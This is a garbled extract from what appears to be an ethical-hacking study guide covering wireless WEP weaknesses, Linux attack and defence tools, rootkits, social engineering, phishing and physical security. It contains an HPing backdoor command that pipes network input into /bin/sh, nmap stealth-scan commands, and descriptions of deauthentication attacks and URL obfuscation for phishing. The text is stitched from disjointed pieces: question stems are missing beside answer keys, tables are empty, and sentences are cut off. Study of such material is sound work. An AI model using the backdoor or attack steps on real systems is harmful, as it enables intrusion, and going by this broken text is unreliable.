using the configured SSID, a blank SSID, or an SSID configured as any.
WEP Weaknesses
Wired Equivalent Privacy (WEP) is a component of the IEEE 802.11 wireless local area network
WLAN standard. Its primary purpose is to provide confidentiality of data on wireless networks at a
level equivalent to that of wired LANs.
IEEE chose to employ encryption at the data link layer to prevent unauthorized eavesdropping on a
network. This is accomplished by encrypting data with the RC4 encryption algorithm.
Nevertheless, WEP is vulnerable because of relatively short keys that remain static. Most WEP
products implement a 64-bit shared key, using 40 bits of this for the secret key and 24 bits for the
initialization vector. The key is installed at the wired network AP and must be entered into each client
as well.
WEP was not designed to withstand a directed cryptographic attack. WEP has well-known flaws in the
encryption algorithms used to secure wireless transmissions. Two programs capable of exploiting the
RC4 vulnerability, AirSnort, and WEPCrack, both run under Linux, and both require a relatively small
number of captured data.
Wireless networks are vulnerable to DoS attacks, as well, due to the nature of the wireless
transmission medium. WLANs send information via radio waves on public frequencies, thus they are
susceptible to interference from traffic using the same radio band, whether the interference is
deliberate or accidental.
If an attacker makes use of a powerful transmitter, enough interference can be generated to prevent
wireless devices from communicating with one another. DoS attack devices do not have to be right
next to the devices being attacked; they need only be within range of the wireless transmissions.
Examples of techniques used to deny service to a wireless device are:
Request for authentication at such a frequency as to disrupt legitimate traffic.
Request deauthentication of legitimate users. These requests may not be refused according to
the current 802.11 standard.
Mimic the behavior of an access point to convince unsuspecting clients to communicate with it.
Repeatedly transmit RTS/CTS frames to silence the network.
NetStumbler. NetStumbler displays wireless access points, SSIDs, channels, whether WEP
encryption is enabled, and signal strength. NetStumbler can connect with GPS technology to log
the precise location of access points.
MiniStumbler. This is a smaller version of NetStumbler designed to work on PocketPC 3.0 and
PocketPC 2002 platforms. It provides support for ARM, MIPS, and SH3 CPU types.
AirSnort. AirSnort is a WLAN tool that cracks WEP encryption keys. AirSnort passively monitors
wireless transmissions and automatically computes the encryption key when enough packets
have been gathered.
Kismet. Kismet is an 802.11 wireless network detector, sniffer, and intrusion detection system.
Kismet identifies networks by passively collecting packets and detecting standard named
networks, detecting (and given time, decloaking) hidden networks, and inferring the presence of
non-beaconing networks via data traffic.
SSID Sniff. A tool to use when looking to discover access points and save captured traffic.
Comes with a configured script and supports Cisco Aironet and random prism2 based cards.
WifiScanner. WifiScanner analyzes traffic and detects 802.11b stations and access points. It can
listen alternatively on all 14 channels, write packet information in real time, and search access
points and associated client stations. All network traffic may be saved in the libpcap format for
analysis.
Wireless packet analyzers, or sniffers, basically work the same way as wired network packet
analyzers: They capture packets from the data stream and allow the user to open them up and look
at, or decode, them. Some wireless sniffers dont employ full decoding tools but show existing WLANs
and SSIDs.
A few of the wireless sniffers available are:
AirMagnet. AirMagnet is a wireless tool originally developed for WLAN inventory, but it has
become a useful wireless security assessment utility.
AiroPeek. WildPackets AiroPeek is a packet analyzer for IEEE 802.11b wireless LANs,
supporting all higher-level network protocols such as TCP/IP, AppleTalk, NetBEUI, and IPX.
AiroPeek is used to isolate security problems by decoding 802.11b WLAN protocols and by
analyzing wireless network performance with an identification of signal strength, channel, and
data rates.
Sniffer Wireless. McAfee Sniffer Wireless is a packet analyzer for managing network
applications and deployments on Wireless LAN 802.11a and 802.11b networks. It has the ability
to decrypt Wired Equivalent Privacybased traffic (WEP).
Wireless offers the possibility of always-on, instant mobile communications; however, the
vulnerabilities inherent to wireless computing present daunting hurdles. These vulnerabilities
(eavesdropping, session hijacking, data alteration and manipulation, in conjunction with an overall
lack of privacy) are major challenges posed by wireless technologies.
Fortunately, steps can be taken to lessen the impact of these threats. Securing wireless networks
includes adopting a suitable strategy such as MAC address filtering, firewalls, or a combination of
protocol-based measures. A few specific steps are:
Change the APs default admin password.
Change the access points default SSID.
Disable the Broadcast SSID function on the AP.
Enable WEP with the stronger 128-bit encryption, not the breakable 40-bit.
Employ MAC address filtering.
Implement an authentication server to provide strong authentication.
Physically locate the AP in an area that limits its radio emanations.
Logically put the AP in a DMZ with the firewall between the DMZ and the internal network.
Implement VPN tunnels.
Disable DHCP, and assign static IP addresses.
Test penetration vulnerability regularly.
Research migrating to 802.11i technologies and new WEP encryption workarounds.
Social Engineering
Social engineering describes the acquisition of sensitive information or inappropriate access privileges
by an outsider, by manipulating people. It exploits the human side of computing, tricking people into
providing valuable information or allowing access to that information.
Social engineering is the hardest form of attack to defend against because it cannot be prevented with
hardware or software alone. A company may have rock-solid authentication processes, VPNs, and
firewalls but still be vulnerable to attacks that exploit the human element.
Social engineering can be divided into two types: human-based, person-to-person interaction and
computer-based interaction using software that automates the attempt to engineer information.
Common techniques used by an intruder to gain either physical access or system access are:
Assessment Questions
The answers to these questions can be found in Appendix A.
1.
2.
3.
4.
Footprinting involves which two steps in the seven-step process of gathering information?
a. Mapping the network and detecting operating systems
b. Detecting operating systems and fingerprinting services
c. Identifying active machines and finding open ports
d. Gathering information and determining the network range
5.
6.
7.
8.
9.
1.
Answer: b
2.
Answer: c
3.
Answer: a
4.
Answer: d
5.
Answer: b
6.
Answer: c
7.
Answer: a
8.
Answer: a
9.
Answer: b
10. Answer: c
11. Answer: a
12. Answer: d
13. Answer: c
14. Answer: a
15. Answer: d
Linux History
Linux is a Unix-like operating system family, as well as one of the most prominent examples of free
software and open source development; its underlying source code can be modified, used, and
redistributed by anyone, freely. In 1991, Linus Torvalds began to work on the Linux kernel while he
was attending the University of Helsinki. Torvalds originally intended Linux to be a noncommercial
replacement for Minix. Figure 11-1 shows the timeline development of the Unix family of languages
and how Linux fits in.
A Linux distribution (called a distro) is a member of the Linux family of Unix-like operating systems
comprising the Linux kernel, the nonkernel parts of the GNU operating system, and assorted other
software.
There are currently over 300 Linux distribution projects in active development, some commercial,
some free. The more popular are:
Debian
Gentoo
Fedora Core (Red Hat)
SUSE Linux (Novell)
Ubuntu (Canonical Ltd.)
Mandriva Linux
Linux distributions take a variety of forms, from fully featured desktop and server operating systems to
minimal implementations, for use in embedded systems, or for booting from a floppy.
Compiling Programs in Linux
There are generally three steps to compiling programs under Linux:
1. Configuring how the program will be complied
2. Compiling the program
3. Installing the program
4. $ ./configure
5. $ make
6. $ su
7. Password
8. $ make install
$ exit
NMap
Many Linux tools work quite well for scanning. The most popular port scanner for Linux is probably
NMap (www.insecure.org/NMap). Also available for the Windows platform, NMap can scan a system
in a variety of stealth modes, depending upon how undetectable you want to be. NMap can determine
a lot of information about a target, like what hosts are available, what services are offered, and what
OS is running.
Weve covered NMap in a lot of detail earlier in the book, but lets review the four most common
command-line settings NMap uses to perform a network scan:
Stealth Scan, TCP SYN: NMap -v -sS 192.168.0.0/24
UDP Scan: NMap -v -sU 192.168.0.0/24
Stealth Scan, No Ping: NMap -v -sS -P0 192.168.0.0/24
Fingerprint: NMap -v -O 192.168.0.0/24 #TCP
Other port scanning tools for Linux systems include SATAN, NSAT, VeteScan, SARA, Portscanner,
Network Superscanner, CGI Port Scanner, and CGI Sonar.
SATAN
The first-generation assistant, the Security Administrators Tool for Analyzing Networks (SATAN), was
developed in early 1995. It became the benchmark for network security analysis for several years;
however, few updates were provided and the tool slowly became obsolete. It has been superseded by
Saint, Nessus, and SARA.
Nessus
One essential type of tool for any attacker or defender is the vulnerability scanner. Although intended
to be used to harden systems, the vulnerability scanner allows the attacker to connect to a target
system and check for such vulnerabilities as configuration errors, default configuration settings that
allow attackers access, and the most recently reported system vulnerabilities.
The preferred open-source tool for this is Nessus (www.nessus.org). Nessus is an extremely powerful
network scanner and can be configured to run a variety of attacks. Nessus is a security scanner for
Linux, BSD, Solaris, and other flavors of Unix, performs over 900 remote security checks, and
suggests solutions for security problems.
Cheops-ng has the ability to probe hosts to see what services they are running. On some services,
Cheops-ng is able to see what program is running for a service and the version number of that
program. Figure 11-3 shows a Cheops-ng service listing.
SARA
The Security Auditors Research Assistant (SARA) (www-arc.com/sara) is a third-generation Unixbased security analysis tool that supports the FBI Top 20 Consensus on Security. It operates on most
Unix-type platforms, including Linux and Mac OS X, and is the upgrade of the now-outdated SATAN
tool. Getting SARA up and running is a straightforward compilation process, and SARA interfaces with
NMap for OS fingerprinting. Some of SARAs features include:
Integrates with the National Vulnerability Database (nvd.nist.gov)
Performs SQL injection tests
Adapts to many firewalls
Supports CVE standards
Available as a free-use open SATAN-oriented license
Sniffit
Sniffit (http://reptile.rug.ac.be/~coder/sniffit/sniffit.html) is a popular and fast Ethernet packet sniffer for
Linux. You can run it either on the command line with optional plug-ins and filters or in interactive
mode, which is the preferred mode. The interactive mode of Sniffit allows you to monitor connections
in real-time and, therefore, sniff real-time, too. Sniffit isnt maintained anymore and can be unstable.
HPing
HPing (www.hping.org) is a command-line TCP/IP packet assembly/analyzer. Weve discussed HPing
before as a ping utility, but HPing also has an often overlooked ability to be used as a backdoor Trojan
Horse.
To use HPing as a Trojan, an attacker would enter the following command on the victims machine: $
./hping2 -I eth) -9ecc | /bin/sh. This lets the attacker Telnet into any port of the victims
computer and invoke commands remotely by preceding any Unix/Linux commands with ecc, such as:
$ telnet victim.com 80
$ eccecho This Text imitates a trojan shovel
Linux Rootkits
Weve discussed rootkits previously; these are also prevalent in the Linux environment. One way an
intruder can maintain access to a compromised system is by installing a rootkit.
A rootkit contains a set of tools and replacement executables for many of the operating systems
critical components used to hide evidence of the attackers presence and to give the attacker
backdoor access to the system. Rootkits require root access to install, but once set up, the attacker
can get root access back at any time. Linux Rootkit v5
(http://packetstormsecurity.org/UNIX/penetration/rootkits/indexsize.html) is the most recent release of
the famous Linux Trojan rootkit, LR.
Rootkit Countermeasure: Chkrootkit
Chkrootkit (www.chkrootkit.org) is a tool to locally check for signs of a rootkit. It contains:
chkrootkit shell script that checks system binaries for rootkit modification.
ifpromisc.c, which checks if the interface is in promiscuous mode
chklastlog.c, which checks for lastlog deletions
chkwtmp.c, which checks for wtmp deletions
check_wtmpx.c, which checks for wtmpx deletions (Solaris only)
chkproc.c, which checks for signs of LKM trojans
chkdirs.c, which checks for signs of LKM trojans
strings.c, which quick and dirty strings replacement
chkutmp.c, which checks for utmp deletions
Chkrootkit detects about 60 of the most common rootkits and has been tested on Linux 2.0.x, 2.2.x,
2.4.x and 2.6.x; FreeBSD 2.2.x, 3.x, 4.x and 5.x; OpenBSD 2.x and 3.x; NetBSD 1.6.x; Solaris 2.5.1,
2.6, 8.0, and 9.0; HP-UX 11; Tru64; BSDI; and Mac OS X.
The following example shows how to use the change shell command (chsh). For a hacker to build
this rootkit properly using this example, he must compile only chsh in the chsh directory and use fix
to replace the original with the Trojan version:
$ make
gcc -c -pipe -02 -m486 -fomit -frame-pointer -I. -I -
Linux Firewalls
There are a number of firewall products for the Linux OS. Two popular opensource Linux firewalls are
IPChains and IPTables.
IPChains
IPChains (http://people.netfilter.org/~rusty/ipchains/) is a very general TCP/IP packet filter; it allows
you to ACCEPT, DENY, MASQ, REDIRECT, or RETURN packets.
Chains are the rule sets executed in order; whenever a packet matches a rule, that specific target is
executed. There are three chains that are always defined: input, output, and forward. The chain is
executed whenever a packet is destined for a network interface. The output chain is executed
whenever a packet is exiting a network interface, and the forward chain is executed whenever a
packet must traverse multiple interfaces.
IPTables
IPTables (www.netfilter.org) is designed to improve and replace IPChains. IPTables has many more
features than IPChains, such as:
The Linux kernel is well integrated with the program for loading IPTables-specific kernel modules
designed for improved speed and reliability.
The firewall keeps track of each connection passing through it and in certain cases will view the
contents of data flows in an attempt to anticipate the next action of certain protocols. This is
called stateful packet inspection and is an important feature in the support of active FTP and
DNS, as well as many other network services.
Packets are filtered based on a MAC address and the values of the flags in the TCP header. This
is helpful in preventing attacks using malformed packets and in restricting access from locally
attached servers to other networks in spite of their IP addresses.
System logging provides the option of adjusting the level of detail of the reporting.
There is better network address translation.
There is support for transparent integration with such Web proxy programs as Squid.
A rate limiting feature helps IPTables block some types of DoS attacks.
Considered a faster and more secure alternative to IPChains, IPTables has become the default
firewall package installed under RedHat and Fedora Linux.
StackGuard has been a very popular compiler that has helped to harden programs against stack
smashing attacks. Programs that have been compiled with StackGuard are largely immune to stack
smashing. Unfortunately, as of this writing, the organization distributing StackGuard, immunix.org,
is no more. Its assumed that the program will eventually return in another form.
Snort (www.snort.org). This is a flexible packet sniffer/logger that detects attacks. Snort is an
open source network intrusion prevention and detection system utilizing a rule-driven language,
which combines the benefits of signature, protocol, and anomaly based inspection methods.
Snort is a very commonly deployed intrusion detection and prevention tool.
Stunnel (www.stunnel.org). Stunnel is a universal SSL wrapper that allows you to encrypt
arbitrary TCP connections inside Secure Sockets Layer (SSL) and is available on both Unix and
Windows. Stunnel can allow you to secure non-SSL aware daemons and protocols (like POP,
IMAP, NNTP, LDAP, and so on) by having Stunnel provide the encryption, requiring no changes
to daemons code.
MRTG (www.mrtg.org). The Multi-Router Traffic Grapher (MRTG) is a tool to monitor the traffic
load on network links.
The programs in the following list log the client hostname of incoming Telnet, FTP, rsh, rlogin, finger,
and other requests:
Ntop (www.ntop.org/download.html). Ntop is a Unix/Linux tool that shows the network usage,
similar to what the popular top Unix/Linux command does. Ntop is based on libpcap, and it has
been written in a portable way in order to run on every Unix platform and on Win32 as well.
and port scan detection functionality. The portscan detector is an option that can be chosen at
compile time. The portscan detector simply logs the offending IP address via syslog.
Assessment Questions
The answers to these questions can be found in Appendix A.
1.
2.
3.
4.
5.
6.
7.
8.
9.
1.
Answer: b
2.
Answer: c
3.
Answer: a
4.
Answer: c
5.
Answer: a
6.
Answer: b
7.
Answer: a
8.
Answer: b
9.
Answer: c
10. Answer: d
11. Answer: c
12. Answer: a
13. Answer: d
14. Answer: b
15. Answer: d
16. Answer: d
Social Engineering
Social engineering involves obtaining protected information from individuals by establishing
relationships with them and manipulating them. The information obtained can be passwords, personal
information, account information, PINs, and other data that a hacker can use to mount attacks and
access critical information system resources.
The two principal forms of social engineering are human-based (person-to-person) and computerbased. In the human-based, or person to person, social engineering, the attacker interacts on a
personal level with the target individual to extract sensitive information. The exchange could be in
person or over the telephone. The computer-based approach relies on software in some form, such
as email, to acquire sensitive data.
In person. The attacker gathers information in person on the premises of an organization. Two
examples of an in person exploit are:
Important user posing. The attacker pretends to be an individual in a position of authority and
uses that pretense to intimidate people into providing information for fear of offending the
important person.
Technical support or help desk. The attacker poses as a technical support person for an
organization and requests passwords and other sensitive information from a trusting employee by
telephone or in person. For example, telephone requests to persons at their desks might state
that the organizations network is going to be shut down for testing and passwords have to be
changed. The technical support impersonator might then request the unsuspecting users
password in order to make sure that the user will be able to get back on line rapidly when the
system test is over.
Authorization by a third party. The attacker convinces an unsuspecting individual that he or she
is authorized by a third party in a position of authority to receive sensitive information from the
individual.
Mail / IM attachments. Email and IM attachments, when opened by an unsuspecting user, can
install malware such as Trojan horses and viruses into the users computer.
Pop-up windows. Pop-up windows can simulate an urgent condition on a users computer and
request sensitive information to restore the computer to normal operation.
Spam mail. Spam email can initiate fraud by a variety of means such as billing or payment
requests, requests for Social Security numbers, and queries for other personal information.
Websites. Fake Websites that appear legitimate and are supposedly pages from reputable
institutions can request information such as passwords for financial institutions, Social Security
numbers, and other sensitive data.
victim should go to credit rating company site (URL provided) and log in to check if the activity is
fraudulent. The website at the URL is a fake site set up by the social engineer to look like a valid site.
The login requests the victims user ID, birth date, Social Security number, and PIN. The attacker thus
obtains information useful in identity theft.
An attacker, helping a friend set up his or her computer at home so that the friend can access files at
his or her place of employment and work at home on weekends, asks the friend for company modem
phone number, password for network access, and password for friends computer. With this
information, attacker can later gain full access to the companys network.
Phishing
Phishing is the process of obtaining sensitive personal data, usually financially related information,
under false pretenses from unsuspecting individuals for fraudulent purposes. Typically, bank account
numbers, PINs, and Social Security numbers are targets of phishing. The term phishing is derived
from the combination of the word phreaking, which refers to telephone network hackers, and fishing,
as in fishing for data. Phishing is a particularly attractive approach to hackers and criminals because
many people use the Internet for banking and other financial transactions. The associated accounts
are vulnerable to phishing attacks.
Phishing messages and Web hosting can be based on servers whose organizations tolerate phishing
activity, on computers that have been compromised by hackers, and on servers of reputable Web
hosting organizations that are unaware of the activity. The latter organizations will usually shut down
the phishing website when they become aware of the phishing activity.
In a typical phishing attack, the hacker will send a fraudulent email message with fake headers stating
the email is from a bank. The message will further ask for a confirmation of the victims bank account
user ID and password for some fictional reason. The email will usually provide a link to a web server
that generates a window that looks like the banks Web site and has fields in which the victim is asked
to enter his or her ID and password.
Netcraft, an English Internet Services company, has developed an anti-phishing toolbar to counter the
phishing threat. The Netcraft anti-phishing technology employs the toolbar as a user interface and
central servers that contain a database of information provided by users and Netcraft about websites
and URLs on the Internet. The central database is a repository of data about each site visited by a
user. The information includes the hosting country and location, how long the website has been in
place, and frequency of use by others. In this way, the Netcraft community keeps watch and informs
others of fraudulent Web sites and URLs that are used in phishing attacks. For example, if a user
reports a URL as a phishing site, that site is blocked to other members of the Netcraft toolbar
community.
Hidden Frames
Hidden frames are a means to maintain the state of a website without using cookies to store session
variables. Visible frames hold information and associated hidden frames store data until they are
required.
An attacker can define two frames in HTML code. The primary frame holds the URL data for a valid
site, while the hidden frame contains the running attack code. The legitimate frame occupies 100
percent of the browser interface and, consequently, the hidden frame consumes 0 percent of the
browser interface.
The hidden frame serves as a means to present a false Web page and acquire sensitive information
such as IDs and passwords.
URL Obfuscation
Hackers phishing with fake websites sometimes use techniques to obscure the fake sites URL. Public
domain registration records can be obtained that show the owners of domain names. Thus, an
attacker faces the possibility of being traced to a phishing domain. The Internet service provider can
also be notified by phishing victims and can trace an attacker through the use of a non-obscured URL.
There are a number of ways to obscure URLs, including the following:
Representing characters in the URL in hexadecimal format
Expressing the domain name as decimal IP address in different formats, such as hexadecimal,
octal, or double word (dword)
Adding irrelevant text after http:// and before the @ symbol
There are tools available to create image maps. Some of these tools are Mapedit and Dreamweaver
by Macromedia.
Identity Theft
Identity theft is stealing another persons personal information and using that information to assume
the persons identity. Once the attacker has the ability to impersonate another individual, he or she
can commit credit card fraud, mail fraud, or other financial transactions in the name of the victim.
Attackers can obtain personal information in the following ways:
Phishing through phone calls, emails, and fake websites
Stealing personal information from financial institutions
Dumpster diving
Stealing a persons mail
Stealing credit card numbers from data storage
Stealing a wallet or purse
Once an attacker has an individuals personal information, he or she can open credit card accounts in
the name of the victim, obtain a loan in a bank, open checking accounts for writing bad checks in the
victims name, or obtain a drivers license in the victims name. Some warning signals of identity theft
include the following:
Unauthorized or unknown long distance calls on a victims telephone bill
Unknown checks showing up on the victims checking account statements
Phone calls from collection agencies concerning unpaid bills
Denial of credit when applying for new accounts
Victims of identity theft should contact the U.S. Federal Trade Commission at their hot line: 1-877IDTHEFT (438-4338).
Background checks
Exit interviews
Upon termination, removing the employees network access
Upon termination, making sure the employee turns in all company property
Non-disclosure agreements (NDAs)
Additional personnel and human resource practices
Physical security procedures
Privacy issues
Processing and enforcing violations
Protecting against viruses, Trojan horses, and worms
Responding to social engineering incidents
Restricting/prohibiting modems on an organizations network
Sensitive but Unclassified (SBU). Information designated as a minor secret but might
not create serious damage if disclosed.
Secret. The unauthorized disclosure of this information could cause serious damage to
the countrys national security.
Top Secret. The unauthorized disclosure of top secret information will cause
exceptionally grave damage to the countrys national security.
Typical private sector classification definitions:
Sensitive. Information that requires a higher level of classification than normal data.
Principles of confidentiality and integrity are enforced.
Private. Personal information that is intended for use within the organization.
Disclosure could adversely impact the organization and its employees.
Confidential. The most sensitive business information that is intended strictly for use
within the organization. Unauthorized disclosure could seriously impact the
organization and its stockholders.
Social engineering physical security. Physical security measures also play a role in preventing
and identifying social engineering attacks. Some physical security practices that are effective
against social engineering are:
Verify the identities of individuals entering the facilities.
Secure sensitive documents in locked cabinets.
Label sensitive documents prominently.
Do not leave documents in open view.
Shred all discarded paper documents.
Erase all magnetic bulk media.
Encrypt all hard drives.
Secure PBX systems, and cover their use by policy such as limiting transfers to make long
distance calls
Physical Security
Physical security is a necessary component in the array of countermeasures to hacking. Physical
security is concerned with a variety of elements, such as physical access to facilities; environmental
issues including power sources, biometrics, natural disasters, equipment, fire protection, inventory
control; and media erasure and destruction. Physical security compromises can affect the
confidentiality, integrity, and availability of information systems through events such as physical loss of
equipment, damage to equipment, disruptions in service, and loss of data. Typical threats to physical
security include:
Human actions such as war, labor strikes, sabotage, theft, and vandalism
Natural events such as thunderstorms, hurricanes, tidal waves, snow storms, earthquakes, and
tornadoes
Disasters such as release of toxic gases, fires, loss of heat, loss of electrical power, loss of air
conditioning, equipment failure, and water damage
In evaluating failure of various types of equipment, two metrics are useful. The first is the Mean Time
Between Failure (MTBF), and the second is the Mean Time to Repair (MTTR). MTBF is the estimated
mean time that the piece of equipment will remain operational before it needs to be repaired or
replaced. The MTTR is the estimated mean time required to repair a piece of equipment and place it
back in service.
remodeling older space. Construction issues that have to be taken into account are heights and fire
ratings of walls and ceilings, weight ratings and electrical conductivity of floors (to reduce static
buildup) and possible raised flooring. Additional considerations are window security, doors and
emergency exits, sprinkler systems, accessibility of shutoff switches and valves, proper air
conditioning, positive air pressure to protect against toxins entering the building, and proper electrical
design and backup power sources.
In selecting a new site for a data facility, a number of different areas have to be considered, as listed
in Table 12-1.
Table 12-1: Site Selection Considerations
Open table as spreadsheet
ITEM
CONSIDERATIONS
Local environment
Joint tenancy
Visibility
Transportation
Emergency
services
Another aspect of facility control is an access log of events associated with entering the facility. The
log should generate the following information:
Security violations
Modification of access privileges and by whom
Time and date of access attempts
Successful and unsuccessful access attempts
Point of entry associated with each access attempt
Name of individual(s) attempting access
Facility controls should also address emergency and related procedures such as training, evacuation
drills, shutdown methods, and equipment testing.
Environmental Controls
Environmental controls deal with the electrical power and heating, ventilation, and air conditioning
(HVAC).
Computer equipment requires clean, uninterrupted power. Electrical power is subject to a variety of
anomalies, as summarized in Table 12-2.
DESCRIPTION
Blackout
Brownout
Fault
Inrush
Noise
Undesired interference
Sag
Spike
Surge
Transient
Noise voltages on power lines can be eliminated or reduced by grounding the equipment properly,
shielding the cables, and minimizing exposure to noise sources such as motors and fluorescent lights.
Surge suppressors are useful in protecting equipment against power surges and voltage spikes, such
as those resulting from lightning strikes.
Controlling humidity is also important relative to electrical systems. A very low-humidity environment
can result in static discharges that can damage and destroy semiconductor devices. Conversely, high
humidity can cause corrosion and short circuits in electrical circuits. Humidity should be between 40
and 60 percent. Static-free carpeting should also be used around computer equipment.
Fire Suppression
Combustible materials are categorized into ratings classes that determine the type of agent that
should be used to extinguish a fire burning those materials. These classes and associated
suppression agents are summarized in Table 12-3.
DESCRIPTION
EXTINGUISHING AGENTS
Common combustibles
Liquid
Electrical
CO2 or Halon
Water, soda acid, carbon dioxide, and Halon are the primary suppression agents for fires. These
extinguishing agents have different characteristics that are applicable to suppress different types of
fires. Carbon dioxide is used in gas-based fire extinguishing systems and displaces the oxygen
necessary to sustain a fire. CO2 is colorless and odorless and, because it removes oxygen from its
environment, it is dangerous to personnel. Therefore, when CO2 is used, alarms must sound to allow
personnel to exit the facility or disable the CO2 discharge.
Soda acid is used primarily in portable fire extinguishers and comprises sodium bicarbonate and
water that also generate CO2 to suppress fires.
Halon has almost ideal characteristics for suppressing fires around electrical and computer
equipment, but has been found dangerous to personnel because at high temperatures it decomposes
into the toxic chemicals bromine, hydrogen fluoride, and hydrogen bromide. Therefore, as with CO2,
personnel have to be given time to evacuate a facility before the Halon is released. Because of its
toxicity at high temperatures and other characteristics such as being ozone-depleting, the Montreal
Protocol of 1987 banned new Halon 1301 use. Federal regulations prohibit the production of Halon,
and laws regulate its disposal. Halon can be recycled for use in existing facilities, but replacing it with
another system is encouraged.
Halon comes in two main forms: Halon 1211, which is a liquid agent, and Halon 1301, a gas.
Specific materials and their corresponding fire class ratings are given in Table 12-4.
Table 12-4: Fire Class Ratings for Combustible Materials
Open table as spreadsheet
FIRE CLASS
COMBUSTIBLE MATERIALS
Flammable liquids and gases, oils, greases, tars, oil-base paints and lacquers
Fire Detection
Fire detection is critical to life safety. Sensing devices are available that respond to heat, flame, or
smoke. Heat sensing detectors respond to either the rate of change of temperature or the actual
temperature level. Flame responding detectors sense the flame pulsation or the flame s infrared
emissions. Smoke detectors incorporate either photoelectric sensors that respond to smoke
interference or radiation-based sensors that detect when smoke interferes with the ionization current.
In addition to devices that sense fires, devices that extinguish fires must also be installed to protect
personnel and equipment. The two most common types of fire extinguishers are water sprinkler
systems and gas discharge systems. The water sprinkler systems operate in four different ways:
Wet pipe. A wet pipe sprinkler system uses a fusible link in the water outlet nozzle. The link is
sensitive to heat and melts when it reaches a temperature of 165 F, releasing water through a
gate valve. Because the water runs to the nozzle, a malfunction can cause a water flood on
sensitive equipment. This type of sprinkler is also known as a closed head system.
Dry pipe. In the dry pipe system, water is not at the sprinkler head, but is held back by a clapper
valve at a distance from the head. When a fire occurs, the clapper valve activates and opens,
releasing the water. The water travels the distance to the head and is released. The dry pipe
system is better suited for computer installations than the wet pipe system because it provides
time to turn off electronic equipment before the water is released.
Deluge. A deluge system is similar to a dry pipe system but releases a much larger amount of
water in the same amount of time.
Preaction. A preaction system incorporates both the wet pipe and dry pipe methods. The water is
held back by a valve as in a dry pipe system, but there is also a fusible link in the sprinkler head
that melts when a fire occurs. In operation, the water is released by the dry pipe valve, travels to
the sprinkler head, and is discharged from the sprinkler head when the fusible link melts.
Preaction is recommended for use in areas with computers and electronic equipment because
the delay allows the equipment to be deactivated before the water flows.
Fires and fire extinguishers can generate harmful environments and contaminants such as high
temperatures, smoke particles, water, and residue from Halon or CO2. These are harmful to both
equipment and people. For example, temperatures above 100o F can damage magnetic storage
media and above 175o F can be harmful to computer equipment.
Access Controls
Access control applies to both physical and data entities. In the physical realm, access controls are
employed in facilities and areas where computational resources reside.
Access Cards
A security access card is a common device that limits access to a building or facility. A dumb security
card has a persons picture, and it is inspected by a guard, whereas a smart card has data or digital
intelligence embedded inside. The smart card is read by an access control computer, which can
record the identity of the individual, time and date of access, and so on. Some smart cards might
require the entry of a PIN such as is used with a bank ATM card.
Some access security cards can also be read by readers that are in proximity to the card. The card
can be passive and respond when the magnetic field of the reader generates currents in the card or it
can be active with its own power supply.
Table 12-5 summarizes the main types of access cards.
Table 12-5: Access Cards
Open table as spreadsheet
CARD TYPE
DESCRIPTION
Photo ID
Picture
Magnetic stripe
Passive electronic
Active electronic
Biometric Systems
There are three types of authentication mechanisms, as follows:
Type 1. Something you know, such as a personal identification number (PIN) or password
Two-factor authentication requires two of the three factors to be used in the authentication process.
For example, withdrawing funds from an ATM requires a two-factor authentication in the form of the
ATM card (something you have) and a PIN number (something you know).
Biometrics addresses the Type 3 factor and provides an automated means of identifying and
authenticating a living person based on physiological or behavioral characteristics. Biometrics is used
for identification in physical controls and for authentication in logical controls.
In physical security, biometrics is based on a Type 3 factor, such as a fingerprint. When an individual
presents his or her fingerprint for identification, a one-to-many search of an individuals characteristics
from a database of stored images is conducted. To authenticate an individual, a one-to-one search of
the database is initiated to verify a claim to an identity made by a person. Biometrics is used for
identification in physical controls and for authentication in logical controls.
To rate the performance of biometrics, three characteristics are commonly used:
False Rejection Rate (FRR) or Type I Error. The percentage of valid subjects that are falsely
rejected
False Acceptance Rate (FAR) or Type II Error. The percentage of invalid subjects that are
falsely accepted
Crossover Error Rate (CER). The percent in which the FRR equals the FAR
A graph showing the FRR and FAR as a function of the sensitivity of the detection device is given in
Figure 12-1. The figure illustrates that if the sensitivity of the detection equipment is increased, the
FRR will increase. Conversely, if the sensitivity is decreased, the FAR will increase. The point on the
graph where the two curves intersect is the CER. The lower the value of the CER, the better the
performance of the biometric device.
Enrollment time. This is the time required to provide acceptable samples of the biometric
characteristic and register with the system. Typical acceptable enrollment times are
approximately two minutes.
Throughput rate. This is the rate at which the system processes and identifies or authenticates
individuals. In working applications, the throughput rate should be approximately 10 subjects per
minute.
Acceptability. This is the measure of how satisfactory and tolerable the biometric system is in
terms of psychological perception, physical comfort, privacy, and invasiveness. For example,
retinal scanners see the blood vessel patterns in the retina. These patterns can reveal if a
person had diabetes or high blood pressure. Similarly, because the retinal scanning device
requires the placement of the eye on an eyepiece, exchange of body fluids is a concern.
Some of the biometric characteristics that are commonly used are shown in Table 12-6.
Table 12-6: Biometric Characteristics
Open table as spreadsheet
CHARACTERISTIC
DESCRIPTION
CER
THROUGHPUT
RATE
Hand geometry
3D hand features
0.1%
4 sec
Iris scan
0.5%
3 sec
Retina scan
1.5%
6 sec
Signature dynamics
Not
available at
this time
8 sec
Fingerprints
4.5%
6 sec
Voice
8%
12 sec
Facial recognition
Not
available at
this time
3 sec
DESCRIPTION
Photoelectric
sensors
Dry contact
mechanisms
Switches or metal foil tape that open a circuit when an intrusion occurs
Motion detectors
Capacitance
detectors
Sound detectors
Voice
DESCRIPTION
Facial recognition
Intrusion detection devices are connected to alarm systems to alert appropriate security personnel of
a possible penetration of a facility. The alarms can be local to the facility, connected to a central
monitoring station operated by the organization, connected to a private security monitoring service, or
connected to a local fire or police station. Alarm systems should also incorporate back-up power
sources and the means to detect tampering in alarm transmission lines.
Fax Machines
Fax machines are an area of vulnerability that has to be protected. Because these devices can send
and receive sensitive information and usually do so in open view, they provide an opportunity for an
attacker to compromise critical data. In models that use ribbons, these discarded supplies can provide
copies of incoming faxes. Fax servers are also vulnerable to penetration by hackers and are
accessible through unprotected maintenance hooks. Controls for fax machines include the following
practices:
Machines should be placed in secure, restricted access areas.
Ribbons and refills should be shredded.
A security policy should be developed, practiced, and enforced for fax machine use and
maintenance.
Fax servers should be protected with security hardware and software.
DESCRIPTION
Guards
Guard dogs
Fences
Important means of facility and boundary control; cost and appearance issues.
Height characteristics: 3 to 4 deters casual trespassers; 6 to 7 difficult to climb
easily; and 8 with strands of barbed wire deters most intruders. Perimeter
Intrusion Detection and Assessment System (PIDAS) fencing incorporates
intrusion sensors in the fence and sounds an alarm when there is movement of
the fence. Susceptible to false alarms from animals or wind.
Mantrap
Access is through a double door arrangement where one door must be closed for
the other to open.
Bollards
Concrete pillars of various sizes and shapes that are placed at the periphery of
